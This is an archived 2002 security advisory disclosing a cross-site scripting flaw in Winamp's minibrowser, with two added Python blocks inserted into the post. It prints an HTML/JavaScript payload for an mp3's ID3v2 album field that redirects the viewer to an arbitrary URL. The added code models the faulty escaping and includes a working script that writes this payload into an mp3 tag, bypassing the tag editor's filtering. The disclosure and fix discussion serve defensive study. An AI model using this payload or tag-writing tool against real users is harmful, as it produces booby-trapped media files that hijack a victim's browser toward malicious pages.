Winamp: Mp3 file can control the minibrowser

From: Andreas Sandblad (sandbladat_private)
Date: Wed Apr 03 2002 - 03:23:17 PST


    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    Title:      Winamp: Mp3 file can control the minibrowser
    Date:       [2002-04-3]
    Tested env: Winamp 2.78c, 2.79 with Win2000 Pro
    Impact:     A specially crafted mp3 file can control the
                minibrowser, e.g. by directing it to an arbitrary
                web page, possibly containing malicious
                HTML code. Also another "call home" issue.
    Status:     Winamp contacted over two weeks ago,
                no response.
    Vendor fix: None. The fix should be on the server side.
    Workaround: Disable minibrowser.                   _     _
                (enabled by default)                 o' \,=./ `o
    Author:     Andreas Sandblad, sandbladat_private   (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--
    
    PROBLEM:
    Winamp has a built-in minibrowser to show information about the song being
    played (enabled by default). For every song currently playing, Winamp will
    direct the minibrowser to a URL like
    http://info.winamp.com/winamp/WA.html?Alb=&Art=Love Project&Cid=winamp&Tid=&Track=Brick
    Winamp gets the title/artist/album information from the ID3v1/ID3v2 tag in
    the mp3 file. The problem is that the HTML page served by info.winamp.com
    doesn't filter the "<" and ">" characters, making it possible to inject
    HTML code into the minibrowser (yet another cross-site scripting problem).
    
    EXPLOIT:
    Every text field in the ID3v1 tag is a fixed slot of 30 bytes, so we use the
    ID3v2 tag instead, whose frames can be as long as we like. It seems that
    Winamp has made some useless efforts to stop this attack, namely converting
    " and ' to \" and \' on the server side. That is a string-literal escape,
    not HTML encoding, and a payload that contains no quote characters is
    passed through unchanged.
    
    So let's put the following HTML code in the album field of the ID3v2 tag of
    our mp3 file:
    <mp3 id=m src=http://ANYURL><script>location=m.src</script>
    It will direct the user to http://ANYURL on load.
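The following is an added illustration, not code from the original post or from Winamp: it models the round trip the advisory describes, Winamp building the WA.html query from the tag fields, the server decoding it and dropping the values into HTML, and shows why the quote-only escaping the author observed does nothing against the payload above while context-correct HTML encoding does. The parameter names come from the URL quoted in the advisory; the page template, the rendering function and the names quote_escape/html_escape/render_info_page/server_side are assumptions made for this example, since the real WA.html is not on the page.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# The advisory's payload: it contains no " or ' characters on purpose.
PAYLOAD = "<mp3 id=m src=http://ANYURL><script>location=m.src</script>"

# Endpoint and parameter names as quoted in the advisory.
INFO_URL = "http://info.winamp.com/winamp/WA.html"


def build_info_url(album, artist, track):
    """Client side: the request Winamp issues for each song (assumed to use
    ordinary query-string encoding; any %XX escaping here is transport-level
    only, because the server decodes it again before use)."""
    query = {"Alb": album, "Art": artist, "Cid": "winamp", "Tid": "", "Track": track}
    return INFO_URL + "?" + urlencode(query)


def quote_escape(value):
    """What the advisory reports the server doing: backslash " and ' only.
    This is a string-literal escape, not HTML encoding; < and > survive."""
    return value.replace('"', '\\"').replace("'", "\\'")


def html_escape(value):
    """The server-side fix: encode for an HTML text/attribute context."""
    return html.escape(value, quote=True)


def render_info_page(album, artist, track, escape):
    """Assumed stand-in for the WA.html template: tag values dropped into HTML
    after passing through the given escape function."""
    return (
        "<html><body>"
        f"<b>Artist:</b> {escape(artist)}<br>"
        f"<b>Album:</b> {escape(album)}<br>"
        f"<b>Track:</b> {escape(track)}"
        "</body></html>"
    )


def server_side(url, escape):
    """Server side: decode the query string and render the info page."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    get = lambda key: params.get(key, [""])[0]
    return render_info_page(get("Alb"), get("Art"), get("Track"), escape)


def contains_markup(rendered, tag="<script>"):
    """True if the tag reaches the browser as live markup."""
    return tag.lower() in rendered.lower()


if __name__ == "__main__":
    url = build_info_url(PAYLOAD, "Love Project", "Brick")
    print("request:", url)
    for name, esc in (("quote-only (vulnerable)", quote_escape),
                      ("html.escape (fixed)", html_escape)):
        print(name, "-> script tag live:", contains_markup(server_side(url, esc)))
```

The takeaway the advisory makes is visible here: the encoding that matters is the one applied at the point where the value enters the HTML, and escaping quotes alone only protects a JavaScript string literal, which is not the context the tag data lands in.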
    
    Adding an ID3v2 tag to an mp3 file is very simple. Open the file in Winamp,
    right click on it and choose "File info". Unmark the ID3v1 tag and mark
    ID3v2. Add the HTML code in the album field. Sometimes Winamp will
    complain about some characters when creating the ID3v2 tag. Then you simply
    have to hex-edit the mp3 file instead.
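Rather than hex-editing by hand, the tag can be written directly. The script below is an added example, not part of the original post or of Winamp: it builds a minimal ID3v2.3 tag (header plus TALB/TPE1/TIT2 text frames, Latin-1 encoded) with the advisory's payload in the album field, prepends it to the audio data, and parses it back the way a tag reader would. The sample "mp3" bytes are constructed and are not a playable stream; the function names and the 30-byte ID3v1 slot check are this example's own, the latter added to show why the author had to move to ID3v2.

```python
import struct

# Constructed sample: a fake MPEG audio frame sync word plus padding,
# standing in for real audio data (not playable).
SAMPLE_MP3 = b"\xff\xfb\x90\x00" + b"\x00" * 60

# The advisory's payload for the album field.
PAYLOAD = "<mp3 id=m src=http://ANYURL><script>location=m.src</script>"

ID3V1_FIELD_LEN = 30  # title, artist and album are fixed 30-byte slots in ID3v1


def syncsafe(n):
    """ID3v2 header size: 4 bytes carrying 7 bits each (MSB of each byte is 0)."""
    if not 0 <= n < (1 << 28):
        raise ValueError("size does not fit in 28 bits")
    return bytes((n >> shift) & 0x7F for shift in (21, 14, 7, 0))


def unsyncsafe(b):
    return (b[0] << 21) | (b[1] << 14) | (b[2] << 7) | b[3]


def text_frame(frame_id, text):
    """ID3v2.3 text frame: 4-byte id, big-endian 32-bit size (not syncsafe in
    v2.3), 2 flag bytes, then an encoding byte (0x00 = ISO-8859-1) and text."""
    body = b"\x00" + text.encode("latin-1")
    return frame_id.encode("ascii") + struct.pack(">I", len(body)) + b"\x00\x00" + body


def build_id3v2(fields):
    """'ID3', version 2.3.0, no flags, syncsafe size of the frames that follow."""
    frames = b"".join(text_frame(fid, txt) for fid, txt in fields.items())
    return b"ID3\x03\x00\x00" + syncsafe(len(frames)) + frames


def strip_id3v2(data):
    """Drop an existing ID3v2 tag from the front of the file, if present."""
    if data[:3] == b"ID3":
        return data[10 + unsyncsafe(data[6:10]):]
    return data


def inject_tag(mp3, fields):
    """Return the file with a fresh ID3v2.3 tag carrying the given text frames."""
    return build_id3v2(fields) + strip_id3v2(mp3)


def read_text_frames(data):
    """Parse the ID3v2.3 text frames back out, as a player would before
    building its info request."""
    if data[:3] != b"ID3" or data[3] != 3:
        raise ValueError("no ID3v2.3 tag at start of file")
    end = 10 + unsyncsafe(data[6:10])
    pos, frames = 10, {}
    while pos + 10 <= end:
        fid = data[pos:pos + 4]
        if fid == b"\x00\x00\x00\x00":  # reached the padding area
            break
        size = struct.unpack(">I", data[pos + 4:pos + 8])[0]
        body = data[pos + 10:pos + 10 + size]
        if fid.startswith(b"T") and body[:1] == b"\x00":
            frames[fid.decode("ascii")] = body[1:].decode("latin-1")
        pos += 10 + size
    return frames


def fits_id3v1(text):
    """ID3v1 would silently truncate anything longer than its 30-byte slot."""
    return len(text.encode("latin-1")) <= ID3V1_FIELD_LEN


if __name__ == "__main__":
    tagged = inject_tag(SAMPLE_MP3, {"TALB": PAYLOAD, "TPE1": "Love Project", "TIT2": "Brick"})
    print(read_text_frames(tagged))
    print("payload fits an ID3v1 field:", fits_id3v1(PAYLOAD))
```

Writing the bytes yourself sidesteps whatever character filtering the Winamp tag editor applies; the player only sees the finished frame. A file written this way is exactly what a detection or forensics engineer should expect to find when hunting for this class of media-file XSS: look for angle brackets inside text frames, not for anything unusual in the audio data.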
    
                                                       _     _
                                                     o' \,=./ `o
                                                        (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--
    Andreas Sandblad, student in Engineering Physics
    at the University of Umea, Sweden.
    ---------------------------------------------------------------
    This archive was generated by hypermail 2b30 : Wed Apr 03 2002 - 09:16:54 PST